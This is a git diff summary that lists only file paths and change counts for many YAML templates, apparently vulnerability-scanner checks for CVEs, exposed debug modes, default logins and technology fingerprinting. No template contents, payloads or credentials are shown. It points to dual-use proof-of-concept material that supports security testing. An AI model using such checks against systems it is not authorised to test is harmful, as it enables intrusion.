poc/cve/cve-2022-2486(1).yaml | 34 + poc/cve/cve-2022-2487(1).yaml | 42 - poc/cve/cve-2022-24899(1).yaml | 35 - poc/cve/cve-2022-25323-6724.yaml | 24 - poc/cve/cve-2022-26134(1).yaml | 45 - poc/cve/cve-2022-26135(1).yaml | 28 + poc/cve/cve-2022-26352(1).yaml | 41 - poc/cve/cve-2022-26564(1).yaml | 41 - poc/cve/cve-2022-26960(1).yaml | 36 + poc/cve/cve-2022-27927(1).yaml | 38 - poc/cve/cve-2022-28079(1).yaml | 38 + poc/cve/cve-2022-28080(1).yaml | 65 - poc/cve/cve-2022-29014(1).yaml | 31 - poc/cve/cve-2022-29299(1).yaml | 37 - poc/cve/cve-2022-29548(1).yaml | 37 + poc/cve/cve-2022-30073(1).yaml | 63 - poc/cve/cve-2022-30489(1).yaml | 42 + poc/cve/cve-2022-30776(1).yaml | 38 - poc/cve/cve-2022-30777(1).yaml | 38 + poc/cve/cve-2022-32007(1).yaml | 37 - poc/cve/cve-2022-32025(1).yaml | 46 - poc/cve/cve-2022-32028(1).yaml | 46 + poc/cve/cve-2022-32409(1).yaml | 31 + poc/cve/cve-2022-33119(1).yaml | 35 + poc/cve/cve-2022-34046(1).yaml | 34 + poc/cve/cve-2022-34047(1).yaml | 34 - poc/cve/cve-2022-34048(1).yaml | 41 + poc/cve/cve-2022-34049(1).yaml | 41 + poc/cve/cve-2022-35416(1).yaml | 39 - poc/cve/cve-2024-23334.yaml | 49 + poc/cve/resin-cnnvd-200705-315-9866.yaml | 26 - poc/cve/resin-cnnvd-200705-315-9867.yaml | 25 + poc/cve/springForShell-CVE-2022-22963.yaml | 36 + poc/debug/Django-DebugMode.yaml | 8 +- poc/debug/airflow-debug-231.yaml | 26 + poc/debug/airflow-debug-233.yaml | 29 - poc/debug/airflow-debug.yaml | 10 +- ...> android-debug-database-exposed-314.yaml} | 0 .../android-debug-database-exposed-315.yaml | 47 +- poc/debug/aspx-debug-mode-575.yaml | 31 + poc/debug/aspx-debug-mode-578.yaml | 33 - poc/debug/aspx-debug-mode-579.yaml | 2 + poc/debug/browserless-debugger-794.yaml | 33 + poc/debug/browserless-debugger.yaml | 29 - poc/debug/coldfusion-debug-xss-1153.yaml | 31 + poc/debug/coldfusion-debug-xss.yaml | 34 - ...bled-6788.yaml => debug-enabled-6789.yaml} | 0 poc/debug/debug-enabled-6790.yaml | 15 + poc/debug/django-debug-detect.yaml | 12 +- 
poc/debug/django-debug-exposed-404.yaml | 24 + poc/debug/django-debug-exposure.yaml | 23 +- poc/debug/laravel-debug-enabled-8576.yaml | 27 - poc/debug/laravel-debug-enabled.yaml | 23 - poc/debug/pyramid-debug-toolbar-9741.yaml | 10 +- poc/debug/rails-debug-mode-9806.yaml | 17 + poc/debug/rails-debug-mode-9807.yaml | 17 - poc/debug/rails-debug-mode.yaml | 17 +- poc/debug/struts-debug-mode.yaml | 11 +- poc/debug/symfony-debugmode-10620.yaml | 27 + poc/debug/wamp-xdebug-detect-11103.yaml | 21 +- poc/debug/wamp-xdebug-detect-11104.yaml | 16 + poc/debug/werkzeug-debugger-detect-11198.yaml | 5 +- ...58.yaml => wordpress-debug-log-11259.yaml} | 0 poc/debug/wp-debug-log.yaml | 58 +- poc/default/JeeSite-default-login.yaml | 5 +- poc/default/Mantis-Default_login.yaml | 47 + poc/default/Redmine-Default-Login.yaml | 21 - poc/default/activemq-default-login-44.yaml | 33 - poc/default/activemq-default-login-46.yaml | 3 +- poc/default/activemq-default-login-48.yaml | 29 + ....yaml => aem-default-get-servlet-135.yaml} | 0 poc/default/aem-default-login-140.yaml | 56 - poc/default/aem-default-login-141.yaml | 8 +- poc/default/aem-default-login-142.yaml | 12 +- poc/default/airflow-default-login-236.yaml | 21 +- poc/default/alphaweb-default-login.yaml | 35 - poc/default/ambari-default-login-287.yaml | 35 - poc/default/ambari-default-login-289.yaml | 35 + poc/default/ambari-default-login-290.yaml | 11 +- poc/default/apisix-default-login-492.yaml | 20 +- poc/default/apollo-default-login-520.yaml | 14 +- ...gin-521.yaml => apollo-default-login.yaml} | 0 poc/default/arl-default-login-537.yaml | 44 - poc/default/arl-default-login-539.yaml | 7 +- poc/default/arl-default-login-540.yaml | 9 +- poc/default/arl-default-password.yaml | 4 + poc/default/azkaban-default-login-674.yaml | 6 +- ...in-673.yaml => azkaban-default-login.yaml} | 0 poc/default/canal-default-login-846.yaml | 44 + poc/default/canal-default-login-848.yaml | 2 +- poc/default/canal-default-login-849.yaml | 35 - 
.../chinaunicom-default-login-906.yaml | 38 - .../chinaunicom-default-login-908.yaml | 8 +- ...chinaunicom-modem-default-credentials.yaml | 2 - ...9.yaml => cobbler-default-login-1118.yaml} | 0 poc/default/cobbler-default-login.yaml | 72 - poc/default/crushftp-default-login.yaml | 59 + poc/default/cs141-default-login-1277.yaml | 13 +- poc/default/cs141-default-login-1279.yaml | 18 +- poc/default/default-apache-test-all-6814.yaml | 4 +- poc/default/default-apache-test-all.yaml | 29 - .../default-apache-test-page-6816.yaml | 6 +- .../default-apache-test-page-6818.yaml | 5 +- poc/default/default-apache2-page-6804.yaml | 8 +- poc/default/default-apache2-page-6806.yaml | 5 +- .../default-apache2-ubuntu-page-6810.yaml | 6 +- poc/default/default-apache2-ubuntu-page.yaml | 17 - poc/default/default-asp-net-page-6824.yaml | 5 +- poc/default/default-asp-net-page.yaml | 17 - .../default-centos-test-page-6826.yaml | 5 +- .../default-centos-test-page-6827.yaml | 6 +- .../default-codeigniter-page-6830.yaml | 7 +- .../default-codeigniter-page-6832.yaml | 8 +- .../default-codeigniter-page-6833.yaml | 23 + poc/default/default-detect-generic-6838.yaml | 25 - poc/default/default-detect-generic.yaml | 22 + poc/default/default-django-page-6840.yaml | 5 +- poc/default/default-django-page-6841.yaml | 10 +- poc/default/default-fastcgi-page-6844.yaml | 5 +- poc/default/default-fastcgi-page-6845.yaml | 6 +- poc/default/default-fedora-page-6848.yaml | 5 +- poc/default/default-fedora-page-6849.yaml | 10 +- poc/default/default-iis7-page-6858.yaml | 17 +- poc/default/default-jetty-page-6862.yaml | 17 + poc/default/default-jetty-page-6863.yaml | 3 +- poc/default/default-lighttpd-page-6866.yaml | 22 - poc/default/default-lighttpd-page-6867.yaml | 5 +- poc/default/default-lucee-page-6868.yaml | 10 +- poc/default/default-lucee-page-6871.yaml | 24 + .../default-microsoft-azure-page-6873.yaml | 9 +- .../default-microsoft-azure-page-6874.yaml | 6 +- poc/default/default-movable-page-6878.yaml | 6 +- 
poc/default/default-movable-page-6879.yaml | 6 +- poc/default/default-nginx-page-6880.yaml | 5 +- poc/default/default-nginx-page-6881.yaml | 19 + poc/default/default-openresty-6886.yaml | 10 +- poc/default/default-openresty.yaml | 17 + .../default-payara-server-page-6894.yaml | 18 - .../default-payara-server-page-6895.yaml | 10 +- .../default-payara-server-page-6896.yaml | 4 +- poc/default/default-plesk-page-6899.yaml | 10 +- poc/default/default-plesk-page.yaml | 17 - .../default-redhat-test-page-6902.yaml | 18 - .../default-redhat-test-page-6903.yaml | 3 +- .../default-redhat-test-page-6904.yaml | 7 +- .../default-ssltls-test-page-6907.yaml | 6 +- .../default-ssltls-test-page-6908.yaml | 7 +- .../dell-idrac-default-login-6945.yaml | 2 +- ...943.yaml => dell-idrac-default-login.yaml} | 0 .../dell-idrac9-default-login-6930.yaml | 32 +- .../dell-idrac9-default-login-6932.yaml | 11 +- .../dolphinscheduler-default-login-7072.yaml | 15 +- .../dolphinscheduler-default-login-7073.yaml | 48 + poc/default/druid-default-login-7096.yaml | 2 +- poc/default/druid-default-login.yaml | 17 +- ...ml => dubbo-admin-default-login-7120.yaml} | 0 .../dubbo-admin-default-login-7121.yaml | 18 +- poc/default/dvwa-default-login-7129.yaml | 7 - ...ogin-7127.yaml => dvwa-default-login.yaml} | 0 poc/default/emcecom-default-login-7211.yaml | 43 - poc/default/emcecom-default-login-7212.yaml | 7 +- poc/default/emqx-default-login-7222.yaml | 35 + poc/default/emqx-default-login.yaml | 5 +- .../exacqvision-default-login-7275.yaml | 17 +- ...77.yaml => exacqvision-default-login.yaml} | 0 poc/default/flir-default-login-7514.yaml | 50 - poc/default/flir-default-login.yaml | 35 + poc/default/frp-default-login-7556.yaml | 40 - poc/default/frp-default-login-7557.yaml | 21 +- poc/default/fuelcms-default-login-7571.yaml | 16 +- poc/default/fuelcms-default-login-7572.yaml | 20 +- poc/default/glpi-default-login-7732.yaml | 15 +- poc/default/glpi-default-login.yaml | 67 + 
poc/default/gophish-default-login-7792.yaml | 14 +- poc/default/gophish-default-login-7793.yaml | 19 +- poc/default/guacamole-default-login-7858.yaml | 12 +- poc/default/guacamole-default-login-7859.yaml | 38 + poc/default/guacamole-default-login-7861.yaml | 10 +- poc/default/hongdian-default-login-7997.yaml | 58 + poc/default/hongdian-default-login-7999.yaml | 50 - .../huawei-HG532e-default-router-login.yaml | 38 - ...awei-hg532e-default-router-login-8063.yaml | 9 +- poc/default/hue-default-credential-8080.yaml | 16 +- poc/default/hue-default-credential-8081.yaml | 62 - poc/default/hue-default-credential.yaml | 62 - .../ibm-storage-default-credential-8124.yaml | 12 +- .../ibm-storage-default-credential-8125.yaml | 21 +- .../idemia-biometrics-default-login-8138.yaml | 17 +- .../idemia-biometrics-default-login-8139.yaml | 33 - ...idemia-biometrics-default-login-8141.yaml} | 0 poc/default/iptime-default-login-8193.yaml | 48 - poc/default/iptime-default-login-8194.yaml | 9 - poc/default/jenkins-default-8270.yaml | 10 +- ...default.yaml => jenkins-default-8272.yaml} | 0 poc/default/jinher-oa-default-login-8311.yaml | 10 +- poc/default/jinher-oa-default-login-8312.yaml | 52 + poc/default/jira-login-default.yaml | 8 +- poc/default/jmx-default-login-8355.yaml | 38 - poc/default/jmx-default-login.yaml | 42 + .../jupyterhub-default-login-8399.yaml | 10 +- .../jupyterhub-default-login-8400.yaml | 35 - .../kafka-center-default-login-8415.yaml | 13 +- poc/default/kafka-center-default-login.yaml | 42 + .../lutron-iot-default-login-8675.yaml | 27 + .../lutron-iot-default-login-8676.yaml | 6 + .../lutron-iot-default-login-8678.yaml | 31 - poc/default/lutron-iot-default-login.yaml | 7 +- .../mantisbt-default-credential-8778.yaml | 59 +- poc/default/nagios-default-login-8990.yaml | 44 + poc/default/nagios-default-login-8994.yaml | 31 - poc/default/netsus-default-login-9060.yaml | 46 - poc/default/netsus-default-login.yaml | 33 + poc/default/nexus-default-login-9088.yaml | 11 +- 
poc/default/nexus-default-login-9089.yaml | 16 +- poc/default/nps-default-login-9145.yaml | 54 - .../octobercms-default-login-9192.yaml | 65 - poc/default/octobercms-default-login.yaml | 59 + poc/default/ofbiz-default-credentials.yaml | 4 +- poc/default/ofbiz-default-login-9210.yaml | 40 - poc/default/ofbiz-default-login-9211.yaml | 9 + poc/default/openemr-default-login-9270.yaml | 6 +- poc/default/openemr-default-login.yaml | 43 - poc/default/openwrt-default-login.yaml | 13 +- ...erations-automation-default-page-9337.yaml | 24 - ...rations-automation-default-page-9339.yaml} | 0 poc/default/panabit-default-login-9438.yaml | 12 +- poc/default/panabit-default-login-9440.yaml | 26 +- .../panabit-ixcache-default-login-9443.yaml | 14 +- .../panabit-ixcache-default-login.yaml | 30 + poc/default/panos-default-login-9454.yaml | 18 +- poc/default/panos-default-login-9455.yaml | 34 + poc/default/panos-default-login.yaml | 42 + poc/default/pentaho-default-login-9477.yaml | 14 +- poc/default/pentaho-default-login-9478.yaml | 33 - poc/default/pentaho-default-login-9480.yaml | 42 + poc/default/rabbitmq-default-admin-9780.yaml | 25 + poc/default/rabbitmq-default-admin-9782.yaml | 25 - poc/default/rabbitmq-default-admin.yaml | 2 - poc/default/rabbitmq-default-login-9783.yaml | 12 +- poc/default/rabbitmq-default-login-9786.yaml | 12 +- poc/default/rainloop-default-login-9811.yaml | 19 +- poc/default/rainloop-default-login.yaml | 44 + poc/default/rancher-default-login-9814.yaml | 11 +- poc/default/rancher-default-login-9815.yaml | 12 +- poc/default/ranger-default-login-9827.yaml | 39 + poc/default/ranger-default-login-9828.yaml | 15 +- poc/default/rockmongo-default-login-9897.yaml | 47 + poc/default/rockmongo-default-login-9899.yaml | 11 +- poc/default/rseenet-default-login-9913.yaml | 9 + poc/default/rseenet-default-login-9914.yaml | 6 +- .../samsung-wlan-default-login-10018.yaml | 45 + poc/default/seeddms-default-login-10125.yaml | 16 +- 
poc/default/seeddms-default-login-10127.yaml | 20 +- .../sequoiadb-default-login-10150.yaml | 17 +- poc/default/showdoc-default-login-10221.yaml | 14 +- .../smartsense-default-login-10330.yaml | 12 +- .../smartsense-default-login-10331.yaml | 9 +- poc/default/solarwinds-default-admin.yaml | 42 +- .../solarwinds-default-login-10356.yaml | 16 +- .../supermicro-default-login-10572.yaml | 11 +- poc/default/supermicro-default-login.yaml | 36 + poc/default/superset-default-login-10574.yaml | 13 +- poc/default/superset-default-login.yaml | 8 + poc/default/szhe-default-login-10636.yaml | 10 +- ...gin.yaml => szhe-default-login-10638.yaml} | 0 .../telecom-gateway-default-login-10686.yaml | 14 +- .../telecom-gateway-default-login.yaml | 33 + poc/default/tomcat-default-login-10791.yaml | 2 +- poc/default/tomcat-default-login.yaml | 76 + .../trilithic-viewpoint-default-10835.yaml | 39 - poc/default/ucmdb-default-login-10868.yaml | 3 +- poc/default/ucmdb-default-login-10871.yaml | 41 + ...in-10869.yaml => ucmdb-default-login.yaml} | 0 poc/default/versa-default-login-11003.yaml | 21 +- poc/default/versa-default-login-11004.yaml | 29 +- poc/default/vidyo-default-login-11009.yaml | 52 - ...in.yaml => vidyo-default-login-11010.yaml} | 0 .../visionhub-default-login-11026.yaml | 42 + .../visionhub-default-login-11027.yaml | 12 +- .../wifisky-default-password-11205.yaml | 38 - poc/default/wifisky-default-password.yaml | 16 +- poc/default/wso2-default-login.yaml | 38 - poc/default/xampp-default-page-11661.yaml | 24 - ...age.yaml => xampp-default-page-11662.yaml} | 0 poc/default/xerox7-default-login-11679.yaml | 21 +- poc/default/xerox7-default-login.yaml | 46 + poc/default/xxljob-default-login-11709.yaml | 53 - poc/default/xxljob-default-login-11712.yaml | 16 +- poc/default/zabbix-default-credentials.yaml | 7 +- poc/detect/Biometric-detect.yaml | 31 +- poc/detect/RedMine-Detect.yaml | 54 + ...nt-detect-32.yaml => acontent-detect.yaml} | 0 ...6.yaml => addeventlistener-detect-64.yaml} | 
0 poc/detect/addeventlistener-detect.yaml | 16 +- poc/detect/adobe-coldfusion-detect-82.yaml | 62 - poc/detect/adobe-coldfusion-detect-83.yaml | 9 +- .../adobe-coldfusion-error-detect-86.yaml | 29 + ...aml => adobe-coldfusion-error-detect.yaml} | 0 poc/detect/airflow-detect-239.yaml | 24 - poc/detect/airflow-detect-240.yaml | 24 + poc/detect/alfresco-detect-258.yaml | 10 + poc/detect/alfresco-detect-259.yaml | 40 - poc/detect/alfresco-detect-260.yaml | 33 + poc/detect/apache-answer-detect.yaml | 45 + poc/detect/apache-axis-detect-339.yaml | 32 + ...etect.yaml => apache-axis-detect-341.yaml} | 0 poc/detect/apache-cocoon-detect-342.yaml | 33 - poc/detect/apache-cocoon-detect.yaml | 27 + ...che-detect.yaml => apache-detect-346.yaml} | 0 poc/detect/apache-detect-348.yaml | 60 +- poc/detect/apollo-server-detect-523.yaml | 37 + ...ect-522.yaml => apollo-server-detect.yaml} | 0 poc/detect/artica-web-proxy-detect-544.yaml | 8 +- poc/detect/artica-web-proxy-detect-545.yaml | 22 - ...-543.yaml => artica-web-proxy-detect.yaml} | 0 poc/detect/autobahn-python-detect-594.yaml | 30 + poc/detect/autobahn-python-detect-595.yaml | 29 - poc/detect/avantfax-detect-598.yaml | 55 +- poc/detect/avantfax-detect-600.yaml | 31 - .../aws-elastic-beanstalk-detect-644.yaml | 7 +- poc/detect/aws-elastic-beanstalk-detect.yaml | 31 - poc/detect/azure-takeover-detection-683.yaml | 29 +- ...687.yaml => basic-auth-detection-689.yaml} | 0 poc/detect/bigbluebutton-detect-723.yaml | 28 - poc/detect/bigbluebutton-detect.yaml | 25 + .../bigip-config-utility-detect-730.yaml | 34 + .../bigip-config-utility-detect-731.yaml | 2 +- .../bigip-config-utility-detect-732.yaml | 42 + poc/detect/burp-api-detect-810.yaml | 28 + poc/detect/burp-api-detect-812.yaml | 27 - poc/detect/burp-api-detect.yaml | 3 +- poc/detect/cacti-detect-826.yaml | 36 - poc/detect/carestream-vue-detect-859.yaml | 14 +- poc/detect/carestream-vue-detect-861.yaml | 30 - poc/detect/centreon-detect-875.yaml | 48 +- 
poc/detect/centreon-detect-877.yaml | 24 - poc/detect/citrix-adc-gateway-detect-981.yaml | 20 - poc/detect/citrix-adc-gateway-detect-983.yaml | 27 + poc/detect/citrix-vpn-detect-987.yaml | 16 - poc/detect/cname-service-detector-1034.yaml | 24 - poc/detect/cockpit-detect-1125.yaml | 31 +- ...ect-1127.yaml => cockpit-detect-1126.yaml} | 0 poc/detect/confluence-detect-1186.yaml | 14 +- poc/detect/confluence-detect-1187.yaml | 40 - poc/detect/confluence-detect-1189.yaml | 41 + poc/detect/contentkeeper-detect.yaml | 14 +- poc/detect/craft-cms-detect-1247.yaml | 3 +- poc/detect/craft-cms-detect.yaml | 28 - poc/detect/crush-ftp-detect-1271.yaml | 40 +- poc/detect/crush-ftp-detect-1272.yaml | 21 + poc/detect/crush-ftp-detect.yaml | 40 +- poc/detect/csrfguard-detect-1291.yaml | 17 +- ...detect-1290.yaml => csrfguard-detect.yaml} | 0 .../custom-data-result-service-detect.yaml | 20 + .../custom-datadump-source-code-detect.yaml | 3 +- poc/detect/darkstat-detect-6767.yaml | 16 +- poc/detect/default-detect-generic-6838.yaml | 25 - poc/detect/default-detect-generic.yaml | 22 + poc/detect/dell-idrac6-detect-6918.yaml | 8 +- poc/detect/dell-idrac6-detect-6920.yaml | 9 +- poc/detect/dell-idrac7-detect-6922.yaml | 15 +- poc/detect/dell-idrac7-detect.yaml | 25 + poc/detect/dell-idrac9-detect-6936.yaml | 14 +- poc/detect/dell-idrac9-detect-6937.yaml | 36 + poc/detect/detect-dangling-cname-6967.yaml | 32 + poc/detect/detect-dangling-cname-6968.yaml | 25 +- poc/detect/detect-drone-config-6972.yaml | 7 +- poc/detect/detect-drone-config-6973.yaml | 25 + poc/detect/detect-jabber-xmpp-6975.yaml | 7 +- poc/detect/detect-jabber-xmpp.yaml | 23 +- ...8.yaml => detect-options-method-6977.yaml} | 0 poc/detect/detect-sentry-6983.yaml | 11 +- poc/detect/detection-zookeeper.yaml | 53 +- poc/detect/django-debug-detect.yaml | 12 +- poc/detect/dns-waf-detect-7052.yaml | 172 + poc/detect/dns-waf-detect-7054.yaml | 34 - poc/detect/dns-waf-detect.yaml | 38 +- poc/detect/druid-detect-7098.yaml | 24 - 
poc/detect/druid-detect.yaml | 13 +- poc/detect/dwr-index-detect-7135.yaml | 29 + poc/detect/dwr-index-detect.yaml | 24 + poc/detect/ec2-detection-7162.yaml | 18 - poc/detect/ec2-detection-7163.yaml | 24 + poc/detect/eg-manager-detect.yaml | 20 + .../elasticsearch-sql-client-detect-7190.yaml | 21 + .../elasticsearch-sql-client-detect-7192.yaml | 4 +- poc/detect/elfinder-detect-7201.yaml | 12 +- poc/detect/elfinder-detect-7202.yaml | 15 +- poc/detect/epson-access-detect-7235.yaml | 40 + poc/detect/epson-access-detect.yaml | 21 +- poc/detect/epson-web-control-detect-7239.yaml | 13 +- poc/detect/epson-web-control-detect-7242.yaml | 10 +- poc/detect/fanruanoa-detect-7391.yaml | 1 - poc/detect/fanruanoa-detect-7392.yaml | 29 + poc/detect/fanruanoa2012-detect-7388.yaml | 26 + poc/detect/fanruanoa2012-detect.yaml | 21 - poc/detect/favicon-detection-7441.yaml | 2026 - poc/detect/favicon-detection-7446.yaml | 97 +- poc/detect/froxlor-detect-7551.yaml | 9 +- poc/detect/froxlor-detect-7553.yaml | 27 + poc/detect/gespage-detect-7603.yaml | 24 + poc/detect/gespage-detect.yaml | 48 +- poc/detect/getsimple-cms-detect-7614.yaml | 8 +- poc/detect/getsimple-cms-detect-7615.yaml | 9 +- poc/detect/gitbook-detect-7623.yaml | 32 +- poc/detect/gitbook-detect-7624.yaml | 5 +- poc/detect/github-enterprise-detect-7649.yaml | 19 + poc/detect/github-enterprise-detect-7650.yaml | 19 +- poc/detect/gradle-cache-node-detect-7797.yaml | 3 +- poc/detect/grafana-detect-7805.yaml | 6 + poc/detect/grafana-detect-7808.yaml | 23 - poc/detect/graphql-detect-7830.yaml | 158 + poc/detect/graphql-detect-7831.yaml | 158 - poc/detect/grav-cms-detect-7842.yaml | 3 +- poc/detect/grav-cms-detect.yaml | 27 - poc/detect/gunicorn-detect-7862.yaml | 25 - poc/detect/gunicorn-detect-7863.yaml | 10 +- poc/detect/hanwang-detect-7881.yaml | 8 +- poc/detect/hanwang-detect-7882.yaml | 8 +- poc/detect/harbor-detect-7886.yaml | 19 - poc/detect/herokuapp-detect-7937.yaml | 19 - poc/detect/herokuapp-detect-7939.yaml | 16 - 
poc/detect/herokuapp-detect.yaml | 8 +- poc/detect/hikvision-detection-7954.yaml | 25 + poc/detect/hikvision-detection-7955.yaml | 27 + poc/detect/hikvision-detection.yaml | 8 +- poc/detect/hp-blade-admin-detect-8004.yaml | 24 - poc/detect/hp-blade-admin-detect-8005.yaml | 46 +- poc/detect/hp-device-info-detect-8009.yaml | 22 + poc/detect/hp-device-info-detect-8010.yaml | 35 - poc/detect/hp-device-info-detect.yaml | 15 +- poc/detect/hp-laserjet-detect-8027.yaml | 19 +- poc/detect/hp-laserjet-detect-8028.yaml | 5 +- poc/detect/hp-media-vault-detect-8030.yaml | 28 - poc/detect/hp-media-vault-detect-8031.yaml | 1 - poc/detect/htpasswd-detection-8046.yaml | 25 + poc/detect/ilo-detect-8154.yaml | 73 +- poc/detect/influxdb-detect-8160.yaml | 11 +- poc/detect/influxdb-detect.yaml | 11 +- poc/detect/iplanet-imap-detect.yaml | 21 +- poc/detect/itop-detect-8203.yaml | 24 - poc/detect/itop-detect.yaml | 15 +- poc/detect/jaspersoft-detect-8220.yaml | 16 - poc/detect/java-rmi-detect-8227.yaml | 17 + poc/detect/java-rmi-detect.yaml | 17 +- poc/detect/jboss-detect-8237.yaml | 34 + poc/detect/jboss-detect.yaml | 22 - poc/detect/jeecg-boot-detect-8247.yaml | 6 +- poc/detect/jeecg-boot-detect-8248.yaml | 21 - poc/detect/jellyfin-detect-8257.yaml | 7 +- poc/detect/jellyfin-detect-8259.yaml | 31 + ...-detect-8258.yaml => jellyfin-detect.yaml} | 0 poc/detect/jenkins-detect-8275.yaml | 27 - poc/detect/jenkins-detect-8276.yaml | 34 + poc/detect/jira-detect-8313.yaml | 25 + poc/detect/jira-detect-8314.yaml | 29 - poc/detect/jira-detect-8316.yaml | 4 + poc/detect/jsf-detection-8397.yaml | 19 - poc/detect/jsf-detection-8398.yaml | 31 + poc/detect/jsf-detection.yaml | 31 +- poc/detect/kevinlab-device-detect-8461.yaml | 12 +- poc/detect/kevinlab-device-detect-8462.yaml | 10 +- ...tect-8484.yaml => kibana-detect-8483.yaml} | 0 poc/detect/kong-detect-8499.yaml | 30 +- poc/detect/kong-detect-8501.yaml | 28 +- poc/detect/linkerd-detect-8633.yaml | 36 + ...d-detect-8632.yaml => 
linkerd-detect.yaml} | 0 poc/detect/linkerd-service-detect-8634.yaml | 38 + poc/detect/linkerd-service-detect.yaml | 6 +- poc/detect/magento-detect-8706.yaml | 8 +- poc/detect/magmi-detect-8714.yaml | 2 +- poc/detect/magmi-detect-8715.yaml | 19 - poc/detect/magmi-detect-8716.yaml | 22 + poc/detect/maian-cart-detect-8719.yaml | 21 - poc/detect/maian-cart-detect.yaml | 14 + poc/detect/mantis-detect-8780.yaml | 15 + poc/detect/metabase-detect-8804.yaml | 35 - poc/detect/metabase-detect.yaml | 21 +- ...microsoft-exchange-server-detect-8853.yaml | 33 + ...microsoft-exchange-server-detect-8854.yaml | 26 + poc/detect/microweber-detect-8863.yaml | 5 +- poc/detect/microweber-detect.yaml | 14 +- poc/detect/minio-detect-8892.yaml | 44 +- poc/detect/minio-detect-8894.yaml | 46 +- poc/detect/moinmoin-detect-8916.yaml | 30 + poc/detect/moinmoin-detect.yaml | 2 +- poc/detect/mongodb-detect-8920.yaml | 20 + poc/detect/mongodb-detect.yaml | 20 +- poc/detect/moveit-detect.yaml | 37 + poc/detect/moveit-transfer-detect.yaml | 34 - poc/detect/ms-adcs-detect-8960.yaml | 24 - poc/detect/ms-adcs-detect-8961.yaml | 29 + poc/detect/ms-adcs-detect.yaml | 7 +- poc/detect/neos-detect-9013.yaml | 15 +- poc/detect/neos-detect.yaml | 27 + poc/detect/netdata-dashboard-detected.yaml | 18 +- poc/detect/nextcloud-detect-9079.yaml | 48 + poc/detect/oauth2-detect-9181.yaml | 32 - poc/detect/oauth2-detect-9182.yaml | 51 +- poc/detect/octobercms-detect-9195.yaml | 25 - poc/detect/octobercms-detect-9196.yaml | 12 +- poc/detect/oidc-detect-9216.yaml | 1 - poc/detect/oidc-detect.yaml | 21 + poc/detect/oipm-detect-9219.yaml | 23 + poc/detect/oipm-detect-9222.yaml | 14 - poc/detect/olivetti-crf-detect-9244.yaml | 28 - poc/detect/oneblog-detect-9246.yaml | 21 + poc/detect/oneblog-detect-9247.yaml | 10 +- ...en-virtualization-manager-detect-9325.yaml | 19 +- .../open-virtualization-manager-detect.yaml | 31 + poc/detect/openam-detection-9257.yaml | 54 +- poc/detect/openam-detection.yaml | 57 +- 
poc/detect/openemr-detect-9271.yaml | 21 - poc/detect/openemr-detect-9273.yaml | 3 +- poc/detect/openemr-detect-9274.yaml | 25 + poc/detect/opensis-detect-9313.yaml | 36 - poc/detect/openx-detect.yaml | 5 - poc/detect/oracle-dbass-detect-9350.yaml | 1 - poc/detect/oracle-dbass-detect-9351.yaml | 21 - poc/detect/oracle-dbass-detect.yaml | 18 - .../owasp-juice-shop-detected-9416.yaml | 21 + ...18.yaml => owasp-juice-shop-detected.yaml} | 0 poc/detect/pega-detect-9474.yaml | 3 +- poc/detect/pega-detect.yaml | 22 - poc/detect/php-proxy-detect-9544.yaml | 8 +- poc/detect/php-proxy-detect.yaml | 26 - poc/detect/phpcollab-detect-9499.yaml | 21 + poc/detect/pi-hole-detect-9581.yaml | 21 - poc/detect/pi-hole-detect-9582.yaml | 22 + poc/detect/pi-hole-detect-9583.yaml | 4 + poc/detect/plone-cms-detect-9607.yaml | 23 - ...detect.yaml => plone-cms-detect-9608.yaml} | 0 poc/detect/prestashop-detect-9651.yaml | 28 + poc/detect/prestashop-detect.yaml | 22 - .../prometheus-exporter-detect-9674.yaml | 2 + poc/detect/prtg-detect-9704.yaml | 18 +- poc/detect/prtg-detect-9706.yaml | 32 - .../puppet-node-manager-detect-9720.yaml | 27 - poc/detect/puppet-node-manager-detect.yaml | 20 + poc/detect/puppetdb-detect-9717.yaml | 15 +- poc/detect/puppetdb-detect-9718.yaml | 11 +- poc/detect/puppetserver-detect-9721.yaml | 12 +- poc/detect/puppetserver-detect-9722.yaml | 40 - poc/detect/redmine-cli-detect-9854.yaml | 23 + poc/detect/remkon-manager-detect.yaml | 4 + poc/detect/rhymix-cms-detect-9877.yaml | 13 +- poc/detect/rhymix-cms-detect-9878.yaml | 22 + poc/detect/rseenet-detect-9916.yaml | 31 - poc/detect/rseenet-detect.yaml | 23 + poc/detect/rstudio-detect-9917.yaml | 19 - poc/detect/rstudio-detect-9919.yaml | 21 + poc/detect/rstudio-detect.yaml | 2 - poc/detect/s3-detect-9964.yaml | 19 +- poc/detect/samba-detect-9988.yaml | 8 +- poc/detect/samsung-printer-detect.yaml | 22 +- poc/detect/sap-netweaver-detect-10042.yaml | 25 +- poc/detect/sap-netweaver-detect-10047.yaml | 30 - 
poc/detect/sap-recon-detect-10063.yaml | 30 - poc/detect/sceditor-detect-10093.yaml | 20 + poc/detect/sceditor-detect-10094.yaml | 7 +- poc/detect/secmail-detect-10109.yaml | 20 + poc/detect/secmail-detect-10112.yaml | 21 - poc/detect/securityspy-detect.yaml | 16 +- poc/detect/seeddms-detect-10129.yaml | 40 +- poc/detect/seeddms-detect-10131.yaml | 21 + ...server-backup-manager-se-login-detect.yaml | 25 +- poc/detect/shiro-detect-10195.yaml | 11 +- poc/detect/shiro-detect-10196.yaml | 19 - poc/detect/shopware-detect-10211.yaml | 24 - poc/detect/shopware-detect-10212.yaml | 4 - poc/detect/sitemap-detect.yaml | 21 +- poc/detect/smartstore-detect-10332.yaml | 9 +- poc/detect/smartstore-detect.yaml | 28 - poc/detect/smb-v1-detection-10336.yaml | 3 +- ...sonicwall-email-security-detect-10384.yaml | 29 + .../sonicwall-email-security-detect.yaml | 17 - .../sophos-fw-version-detect-10397.yaml | 39 +- poc/detect/tableau-server-detect-10643.yaml | 40 + poc/detect/tableau-server-detect.yaml | 31 - poc/detect/tech-detect-10672.yaml | 2730 + poc/detect/tech-detect-10673.yaml | 2672 - poc/detect/tech-detect-10676.yaml | 92 +- .../telerik-dialoghandler-detect-10688.yaml | 3 - .../telerik-dialoghandler-detect-10690.yaml | 38 - .../telerik-dialoghandler-detect-10691.yaml | 37 + .../telerik-fileupload-detect-10692.yaml | 13 +- poc/detect/terraform-detect-10707.yaml | 10 +- poc/detect/thinkcmf-detection-10719.yaml | 25 + poc/detect/thinkcmf-detection.yaml | 23 +- .../tibco-spotfire-services-detect.yaml | 39 + poc/detect/tomcat-detect-10793.yaml | 4 +- poc/detect/tomcat-detect.yaml | 21 +- poc/detect/totemomail-detect.yaml | 4 + poc/detect/trace-axd-detect.yaml | 13 +- ...ized-puppet-node-manager-detect-10958.yaml | 20 + ...ized-puppet-node-manager-detect-10959.yaml | 24 - 